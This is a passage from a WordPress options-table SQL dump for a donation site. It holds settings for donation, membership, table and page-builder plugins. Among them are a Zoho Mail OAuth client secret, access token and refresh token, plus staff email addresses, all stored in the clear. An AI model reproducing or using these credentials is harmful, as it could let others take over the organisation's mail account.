Gopalak.</p>\";s:21:\"babel_polyfill_script\";s:7:\"enabled\";s:8:\"gateways\";a:2:{s:6:\"manual\";i:1;s:7:\"offline\";i:1;}s:15:\"default_gateway\";s:6:\"manual\";s:31:\"global_offline_donation_content\";s:331:\"<p>To make an offline donation toward this cause, follow these steps: </p><ol><li>Write a check payable to \"{sitename}\"</li><li>On the memo line of the check, indicate that the donation is for \"{sitename}\"</li><li>Mail your check to:</li></ol>{offline_mailing_address}<br><p>Your tax-deductible donation is greatly appreciated!</p>\";s:43:\"give_offline_donation_enable_billing_fields\";s:8:\"disabled\";s:23:\"donor_default_user_role\";s:10:\"give_donor\";s:20:\"form_page_url_prefix\";s:4:\"give\";s:29:\"_give_stripe_get_all_accounts\";a:0:{}s:18:\"setup_page_enabled\";s:7:\"enabled\";s:14:\"usage_tracking\";s:7:\"enabled\";s:26:\"sequential-ordering_number\";i:1;s:42:\"offline-donation-instruction_email_message\";s:331:\"<p>To make an offline donation toward this cause, follow these steps: </p><ol><li>Write a check payable to \"{sitename}\"</li><li>On the memo line of the check, indicate that the donation is for \"{sitename}\"</li><li>Mail your check to:</li></ol>{offline_mailing_address}<br><p>Your tax-deductible donation is greatly appreciated!</p>\";s:30:\"donation-receipt_email_message\";s:394:\"Dear {name},\n\nThank you for your donation. Your generosity is appreciated! Here are the details of your donation:\n\n<strong>Donor:</strong> {fullname}\n<strong>Donation:</strong> {donation}\n<strong>Donation Date:</strong> {date}\n<strong>Amount:</strong> {amount}\n<strong>Payment Method:</strong> {payment_method}\n<strong>Payment ID:</strong> {payment_id}\n\n{receipt_link}\n\n\n\nSincerely,\n{sitename}\n\";s:26:\"new-donation_email_message\";s:280:\"Hi there,\n\nThis email is to inform you that a new donation has been made on your website: {site_url}.\n\n<strong>Donor:</strong> {name}\n<strong>Donation:</strong> {donation}\n<strong>Amount:</strong> {amount}\n<strong>Payment Method:</strong> {payment_method}\n\nThank you,\n\n{sitename}\n\";s:22:\"new-donation_recipient\";a:1:{i:0;s:19:\"mango@homedirect.in\";}s:30:\"new-offline-donation_recipient\";a:1:{i:0;s:19:\"mango@homedirect.in\";}s:28:\"new-donor-register_recipient\";a:1:{i:0;s:19:\"mango@homedirect.in\";}s:25:\"new-donation_notification\";s:7:\"enabled\";s:12:\"success_page\";i:1772;s:12:\"failure_page\";i:1773;s:10:\"cause_type\";s:13:\"environmental\";}','no'),(142345,'give_default_api_version','v1','no'),(142346,'wp_give_donors_db_version','1.0','no'),(142347,'wp_give_donormeta_db_version','1.0','no'),(142348,'wp_give_comments_db_version','1.0','no'),(142349,'wp_give_commentmeta_db_version','1.0','no'),(142350,'wp_give_sessions_db_version','1.0','no'),(142351,'wp_give_formmeta_db_version','1.0','no'),(142352,'wp_give_sequential_ordering_db_version','1.0','no'),(142353,'wp_give_donationmeta_db_version','1.0','no'),(142355,'give_completed_upgrades','a:41:{i:0;b:0;i:1;s:25:\"v18_upgrades_core_setting\";i:2;s:30:\"v220_rename_donation_meta_type\";i:3;s:38:\"v270_store_stripe_account_for_donation\";i:4;s:17:\"v20_logs_upgrades\";i:5;s:30:\"upgrade_give_user_caps_cleanup\";i:6;s:32:\"upgrade_give_payment_customer_id\";i:7;s:27:\"upgrade_give_offline_status\";i:8;s:26:\"v18_upgrades_form_metadata\";i:9;s:30:\"v189_upgrades_levels_post_meta\";i:10;s:26:\"v1812_update_amount_values\";i:11;s:34:\"v1812_update_donor_purchase_values\";i:12;s:23:\"v1813_update_user_roles\";i:13;s:29:\"v1813_update_donor_user_roles\";i:14;s:43:\"v1817_update_donation_iranian_currency_code\";i:15;s:24:\"v1817_cleanup_user_roles\";i:16;s:39:\"v1818_assign_custom_amount_set_donation\";i:17;s:30:\"v1818_give_worker_role_cleanup\";i:18;s:26:\"v20_upgrades_form_metadata\";i:19;s:32:\"v20_move_metadata_into_new_table\";i:20;s:23:\"v20_rename_donor_tables\";i:21;s:23:\"v20_upgrades_donor_name\";i:22;s:25:\"v20_upgrades_user_address\";i:23;s:29:\"v20_upgrades_payment_metadata\";i:24;s:30:\"v201_upgrades_payment_metadata\";i:25;s:23:\"v201_add_missing_donors\";i:26;s:33:\"v201_move_metadata_into_new_table\";i:27;s:18:\"v201_logs_upgrades\";i:28;s:32:\"v210_verify_form_status_upgrades\";i:29;s:25:\"v213_delete_donation_meta\";i:30;s:28:\"v215_update_donor_user_roles\";i:31;s:22:\"v224_update_donor_meta\";i:32;s:31:\"v224_update_donor_meta_forms_id\";i:33;s:20:\"v230_move_donor_note\";i:34;s:23:\"v230_move_donation_note\";i:35;s:41:\"v230_delete_donor_wall_related_donor_data\";i:36;s:43:\"v230_delete_donor_wall_related_comment_data\";i:37;s:30:\"v240_update_form_goal_progress\";i:38;s:21:\"v241_remove_sale_logs\";i:39;s:39:\"add-past-donation-data-to-revenue-table\";i:40;s:21:\"migrate_existing_logs\";}','no'),(142356,'give_version','2.22.3','no'),(142358,'plugin_activation_give/give.php','2022-10-14 12:30:34','yes'),(142359,'widget_give_forms_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(142362,'give_install_pages_created','1','no'),(142365,'_give_table_check','1666355439','no'),(142369,'give_cache__give_ajax_works','a:2:{s:4:\"data\";s:1:\"1\";s:10:\"expiration\";i:1665817244;}','no'),(142373,'give_onboarding','a:1:{s:7:\"form_id\";i:1774;}','yes'),(142733,'wcdp_fee_recovery_values','{\"razorpay\":{\"fixed\":0,\"variable\":0}}','yes'),(142734,'wcdp_multiple_in_cart','no','yes'),(142735,'wcdp_contribution_title','Your Contribution','yes'),(142736,'wcdp_choose_amount_title','Choose an amount','yes'),(142737,'wcdp_min_amount','300','yes'),(142738,'wcdp_max_amount','3000','yes'),(142739,'wcdp_max_range','500','yes'),(142740,'wcdp_disable_order_notes','no','yes'),(142741,'wcdp_fee_recovery','no','yes'),(142742,'wcdp_main_color','#00753a','no'),(142743,'wcdp_secondary_color','#30bf76','no'),(142744,'wcdp_error_color','#de0000','no'),(144201,'wp_charitable_donors_db_version','1.6.5','yes'),(144202,'wp_charitable_donormeta_db_version','1.6.0','yes'),(144203,'wp_charitable_campaign_donations_db_version','1.5.4','yes'),(144204,'charitable_upgrade_log','a:20:{s:7:\"install\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"message\";s:25:\"Charitable was installed.\";}s:21:\"update_upgrade_system\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:18:\"fix_donation_dates\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:12:\"trigger_cron\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:20:\"flush_permalinks_140\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:27:\"remove_campaign_manager_cap\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:32:\"fix_empty_campaign_end_date_meta\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:39:\"clear_campaign_amount_donated_transient\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:16:\"trim_upgrade_log\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:23:\"remove_duplicate_donors\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:20:\"flush_permalinks_150\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:17:\"release_notes_150\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:17:\"update_tables_154\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:19:\"fix_donor_role_caps\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:20:\"upgrade_donor_tables\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:17:\"release_notes_160\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:19:\"fix_empty_donor_ids\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:21:\"flush_permalinks_1614\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:21:\"flush_permalinks_1621\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}s:43:\"remove_campaign_manager_unfiltered_html_cap\";a:3:{s:4:\"time\";i:1665747102;s:7:\"version\";s:7:\"1.7.0.2\";s:7:\"install\";b:1;}}','yes'),(144206,'wpcharitable_activated_datetime','1665766902','yes'),(144207,'plugin_activation_charitable/charitable.php','2022-10-14 17:01:42','yes'),(144208,'widget_charitable_campaign_terms_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(144209,'widget_charitable_campaigns_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(144210,'widget_charitable_donors_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(144211,'widget_charitable_donate_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(144212,'widget_charitable_donation_stats_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(144213,'charitable_settings','a:15:{s:15:\"default_gateway\";s:6:\"stripe\";s:15:\"active_gateways\";a:1:{s:6:\"stripe\";s:28:\"Charitable_Gateway_Stripe_AM\";}s:7:\"section\";s:7:\"general\";s:7:\"country\";s:2:\"IN\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_format\";s:4:\"left\";s:17:\"decimal_separator\";s:1:\".\";s:19:\"thousands_separator\";s:1:\",\";s:13:\"decimal_count\";s:1:\"2\";s:21:\"donation_form_display\";s:13:\"separate_page\";s:28:\"donation_form_minimal_fields\";s:1:\"0\";s:10:\"login_page\";s:2:\"wp\";s:17:\"registration_page\";s:2:\"wp\";s:12:\"profile_page\";s:4:\"1756\";s:21:\"donation_receipt_page\";s:4:\"auto\";}','yes'),(144217,'_transient_charitable_notices','a:5:{s:5:\"error\";a:0:{}s:7:\"warning\";a:0:{}s:7:\"success\";a:0:{}s:4:\"info\";a:0:{}s:7:\"version\";a:0:{}}','yes'),(144298,'campaign_category_children','a:0:{}','yes'),(144299,'_transient_charitable_campaign_1790_donation_amount','0.0000','yes'),(145555,'_elementor_editor_upgrade_notice_dismissed','1679982023','yes'),(147001,'_transient_charitable_user_dashboard_objects','a:0:{}','yes'),(147674,'plugin_activation_chikkili-google-pay-for-woocommerce/chikkili.php','2022-10-19 10:06:11','yes'),(148232,'plugin_activation_tablepress/tablepress.php','2022-10-19 12:24:02','yes'),(148233,'tablepress_plugin_options','{\"plugin_options_db_version\":110,\"table_scheme_db_version\":3,\"prev_tablepress_version\":\"3.1.1\",\"tablepress_version\":\"3.1.2\",\"first_activation\":1666162449,\"message_plugin_update\":true,\"message_donation_nag\":true,\"use_custom_css\":true,\"use_custom_css_file\":true,\"custom_css\":\"\",\"custom_css_minified\":\"\",\"custom_css_version\":0,\"modules\":false}','yes'),(148251,'tablepress_tables','{\"last_id\":1,\"table_post\":{\"1\":1851}}','yes'),(149380,'action_scheduler_migration_status','complete','yes'),(152868,'_transient_charitable_custom_styles','<style id=\"charitable-highlight-colour-styles\">.campaign-raised .amount,.campaign-figures .amount,.donors-count,.time-left,.charitable-form-field a:not(.button),.charitable-form-fields .charitable-fieldset a:not(.button),.charitable-notice,.charitable-notice .errors a { color:#f89d35; }.campaign-progress-bar .bar,.donate-button,.charitable-donation-form .donation-amount.selected,.charitable-donation-amount-form .donation-amount.selected { background-color:#f89d35; }.charitable-donation-form .donation-amount.selected,.charitable-donation-amount-form .donation-amount.selected,.charitable-notice,.charitable-drag-drop-images li:hover a.remove-image,.supports-drag-drop .charitable-drag-drop-dropzone.drag-over { border-color:#f89d35; }</style>','yes'),(153243,'forminator_version_upgraded','1','yes'),(153608,'charitable_notifications','a:4:{s:6:\"update\";i:1704868707;s:4:\"feed\";a:0:{}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','yes'),(153932,'woocommerce_admin_created_default_shipping_zones','yes','yes'),(153933,'woocommerce_admin_reviewed_default_shipping_zones','yes','yes'),(154053,'webhook_enable_flag','1669100082','yes'),(156209,'plugin_activation_zoho-mail/zohoMail.php','2022-10-28 15:33:11','yes'),(156246,'zmail_integ_client_id','1000.UQS5EWR8ZHVCVJUTQDDVRDE9TKRHSQ','no'),(156247,'zmail_integ_client_secret','9148191bd9089234a859bd2b0e64b5f01533c7b166','no'),(156248,'zmail_integ_from_email_id','namaste@gopalak.in','no'),(156249,'zmail_integ_from_name','Gopalak','no'),(156250,'zmail_integ_domain_name','in','no'),(156251,'zmail_content_type','plaintext','no'),(156255,'zmail_access_token','1000.94edc9ca61263b5948f376dad1a953bd.498c1eaa0f6c0311b30f710c89edf169','off'),(156256,'zmail_refresh_token','MTAwMC42NWVhNjgxNmZkODI3M2QxNjA2NmNiZjFmOGIwNWZkMi5mYTFiZGExNmYzN2MwN2EzMGIxODQxZWJjZTNiZjM0ZA==','no'),(156257,'zmail_integ_timestamp','1746988300','off'),(156600,'zmail_account_id','2664995000000002002','no'),(157089,'new_admin_email','namaste@gopalak.in','yes'),(157131,'wfu_userstate_po7b1wyddpjszwhyf8km142nm6ytmlyj','[wfu_add_shortcode_ticket_for_wordpress_file_upload]2247426671684b626558447a4268707a7922{wfu_add_shortcode_ticket_for_wordpress_file_upload}','yes'),(157963,'plugin_activation_razorpay-payment-button-elementor/razorpay-payment-buttons.php','2022-11-03 09:38:46','yes'),(158611,'woocommerce_navigation_enabled','no','yes'),(158612,'woocommerce_feature_custom_order_tables_enabled','no','yes'),(159614,'forminator_default_report_entry','1','yes'),(161479,'rzp_afd_enable','no','yes'),(161480,'rzp_afd_feature_checked','yes','yes'),(161828,'elementor_1_elementor_updater_batch_42a3977142d397766007b6f7bf50','a:1:{i:0;a:1:{s:8:\"callback\";a:2:{i:0;s:31:\"Elementor\\Core\\Upgrade\\Upgrades\";i:1;s:16:\"_on_each_version\";}}}','no'),(161849,'_elementor_global_css','a:6:{s:4:\"time\";i:1670394368;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;b:0;}','yes'),(161852,'_elementor_assets_data','a:1:{s:3:\"css\";a:1:{s:7:\"widgets\";a:10:{s:5:\"image\";a:2:{s:7:\"content\";s:269:\"<style>/*! elementor - v3.23.0 - 05-08-2024 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>\";s:7:\"version\";s:6:\"3.23.4\";}s:6:\"button\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:6:\"3.23.4\";}s:14:\"image-carousel\";a:2:{s:7:\"content\";s:555:\"<style>/*! elementor - v3.23.0 - 05-08-2024 */\n.elementor-widget-image-carousel .swiper,.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure,.elementor-widget-image-carousel .swiper .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized):not(.swiper-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>\";s:7:\"version\";s:6:\"3.23.4\";}s:6:\"spacer\";a:2:{s:7:\"content\";s:1379:\"<style>/*! elementor - v3.23.0 - 05-08-2024 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));--align-self:var(--container-widget-align-self,initial);--flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container{height:100%;width:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}.e-con-inner>.elementor-widget-spacer.elementor-widget-empty,.e-con>.elementor-widget-spacer.elementor-widget-empty{position:relative;min-height:22px;min-width:22px}.e-con-inner>.elementor-widget-spacer.elementor-widget-empty .elementor-widget-empty-icon,.e-con>.elementor-widget-spacer.elementor-widget-empty .elementor-widget-empty-icon{position:absolute;top:0;bottom:0;left:0;right:0;margin:auto;padding:0;width:22px;height:22px}</style>\";s:7:\"version\";s:6:\"3.23.4\";}s:9:\"image-box\";a:2:{s:7:\"content\";s:1424:\"<style>/*! elementor - v3.23.0 - 05-08-2024 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:end;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:start;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style>\";s:7:\"version\";s:6:\"3.23.4\";}s:7:\"heading\";a:2:{s:7:\"content\";s:673:\"<style>/*! elementor - v3.23.0 - 05-08-2024 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\";s:7:\"version\";s:6:\"3.23.4\";}s:11:\"text-editor\";a:2:{s:7:\"content\";s:719:\"<style>/*! elementor - v3.23.0 - 05-08-2024 */\n.elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:#69727d;color:#fff}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap{color:#69727d;border:3px solid;background-color:transparent}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap{margin-top:8px}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap-letter{width:1em;height:1em}.elementor-widget-text-editor .elementor-drop-cap{float:left;text-align:center;line-height:1;font-size:50px}.elementor-widget-text-editor .elementor-drop-cap-letter{display:inline-block}</style>\";s:7:\"version\";s:6:\"3.23.4\";}s:5:\"video\";a:2:{s:7:\"content\";s:1883:\"<style>/*! elementor - v3.23.0 - 05-08-2024 */\n.elementor-widget-video .elementor-widget-container{overflow:hidden;transform:translateZ(0)}.elementor-widget-video .elementor-wrapper{aspect-ratio:var(--video-aspect-ratio)}.elementor-widget-video .elementor-wrapper iframe,.elementor-widget-video .elementor-wrapper video{height:100%;width:100%;display:flex;border:none;background-color:#000}@supports not (aspect-ratio:1/1){.elementor-widget-video .elementor-wrapper{position:relative;overflow:hidden;height:0;padding-bottom:calc(100% / var(--video-aspect-ratio))}.elementor-widget-video .elementor-wrapper iframe,.elementor-widget-video .elementor-wrapper video{position:absolute;top:0;right:0;bottom:0;left:0}}.elementor-widget-video .elementor-open-inline .elementor-custom-embed-image-overlay{position:absolute;top:0;right:0;bottom:0;left:0;background-size:cover;background-position:50%}.elementor-widget-video .elementor-custom-embed-image-overlay{cursor:pointer;text-align:center}.elementor-widget-video .elementor-custom-embed-image-overlay:hover .elementor-custom-embed-play i{opacity:1}.elementor-widget-video .elementor-custom-embed-image-overlay img{display:block;width:100%;aspect-ratio:var(--video-aspect-ratio);-o-object-fit:cover;object-fit:cover;-o-object-position:center center;object-position:center center}@supports not (aspect-ratio:1/1){.elementor-widget-video .elementor-custom-embed-image-overlay{position:relative;overflow:hidden;height:0;padding-bottom:calc(100% / var(--video-aspect-ratio))}.elementor-widget-video .elementor-custom-embed-image-overlay img{position:absolute;top:0;right:0;bottom:0;left:0}}.elementor-widget-video .e-hosted-video .elementor-video{-o-object-fit:cover;object-fit:cover}.e-con-inner>.elementor-widget-video,.e-con>.elementor-widget-video{width:var(--container-widget-width);--flex-grow:var(--container-widget-flex-grow)}</style>\";s:7:\"version\";s:6:\"3.23.4\";}s:12:\"social-icons\";a:2:{s:7:\"content\";s:5051:\"<style>/*! elementor - v3.23.0 - 05-08-2024 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + 2 * var(--icon-padding, .5em));height:calc(var(--icon-size, 25px) + 2 * var(--icon-padding, .5em))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:inline-flex;background-color:#69727d;align-items:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#69727d}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-threads{background-color:#000}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-x-twitter{background-color:#000}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>\";s:7:\"version\";s:6:\"3.23.4\";}s:9:\"shortcode\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:6:\"3.23.4\";}}}}','yes'),(163227,'charitable_third_party_warnings','{\"plugins\":{\"code-snippets\\/code-snippets.php\":\"noted\"}}','yes'),(166878,'widget_brands_list','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(166879,'widget_brands_dropdown','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(166880,'widget_filter_by_brand','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(169291,'woocommerce_new_product_management_enabled','no','yes'),(187285,'wcfm_updated_6_6_8','1','yes'),(187767,'swpm_db_version','1.5','yes'),(187768,'swpm-settings','a:27:{i:0;b:0;s:29:\"email-activation-mail-subject\";s:40:\"Action Required to Activate Your Account\";s:26:\"email-activation-mail-body\";s:176:\"Dear {first_name}\n\nThank you for registering. To activate your account, please click on the following link (this will confirm your email address):\n\n{activation_link}\n\nThank You\";s:16:\"join-us-page-url\";s:35:\"https://gopalak.in/membership-join/\";s:21:\"registration-page-url\";s:59:\"https://gopalak.in/membership-join/membership-registration/\";s:14:\"login-page-url\";s:36:\"https://gopalak.in/membership-login/\";s:16:\"profile-page-url\";s:55:\"https://gopalak.in/membership-login/membership-profile/\";s:14:\"reset-page-url\";s:51:\"https://gopalak.in/membership-login/password-reset/\";s:18:\"thank-you-page-url\";s:29:\"https://gopalak.in/thank-you/\";s:25:\"reg-complete-mail-subject\";s:29:\"Your registration is complete\";s:22:\"reg-complete-mail-body\";s:211:\"Dear {first_name} {last_name}\n\nYour registration is now complete!\n\nRegistration details:\nUsername: {user_name}\nPassword: {password}\n\nPlease login to the member area at the following URL:\n\n{login_link}\n\nThank You\";s:32:\"reg-prompt-complete-mail-subject\";s:26:\"Complete your registration\";s:29:\"reg-prompt-complete-mail-body\";s:146:\"Dear {first_name} {last_name}\n\nThank you for joining us!\n\nPlease complete your registration by visiting the following link:\n\n{reg_link}\n\nThank You\";s:29:\"upgrade-complete-mail-subject\";s:44:\"Subject for email sent after account upgrade\";s:26:\"upgrade-complete-mail-body\";s:73:\"Dear {first_name} {last_name}\n\nYour Account Has Been Upgraded.\n\nThank You\";s:18:\"reset-mail-subject\";s:21:\"Gopalak: New Password\";s:15:\"reset-mail-body\";s:213:\"Dear {first_name} {last_name}\n\nHere is your new password:\n\nUsername: {user_name}\nPassword: {password}\n\nYou can change the password from the edit profile section of the site (after you log into the site)\n\nThank You\";s:28:\"account-change-email-subject\";s:16:\"Account Updated!\";s:25:\"account-change-email-body\";s:149:\"Dear {first_name} {last_name},\n\nYour account status has been updated! Please login to the member area at the following URL:\n\n {login_link}\n\nThank You\";s:10:\"email-from\";s:26:\"Gopalak <hello@gopalak.in>\";s:31:\"reg-complete-mail-subject-admin\";s:39:\"Notification of New Member Registration\";s:28:\"reg-complete-mail-body-admin\";s:242:\"A new member has completed the registration.\n\nUsername: {user_name}\nEmail: {email}\n\nPlease login to the admin dashboard to view details of this user.\n\nYou can customize this email message from the Email Settings menu of the plugin.\n\nThank You\";s:33:\"bulk-activate-notify-mail-subject\";s:18:\"Account Activated!\";s:30:\"bulk-activate-notify-mail-body\";s:87:\"Hi,\n\nYour account has been activated!\n\nYou can now login to 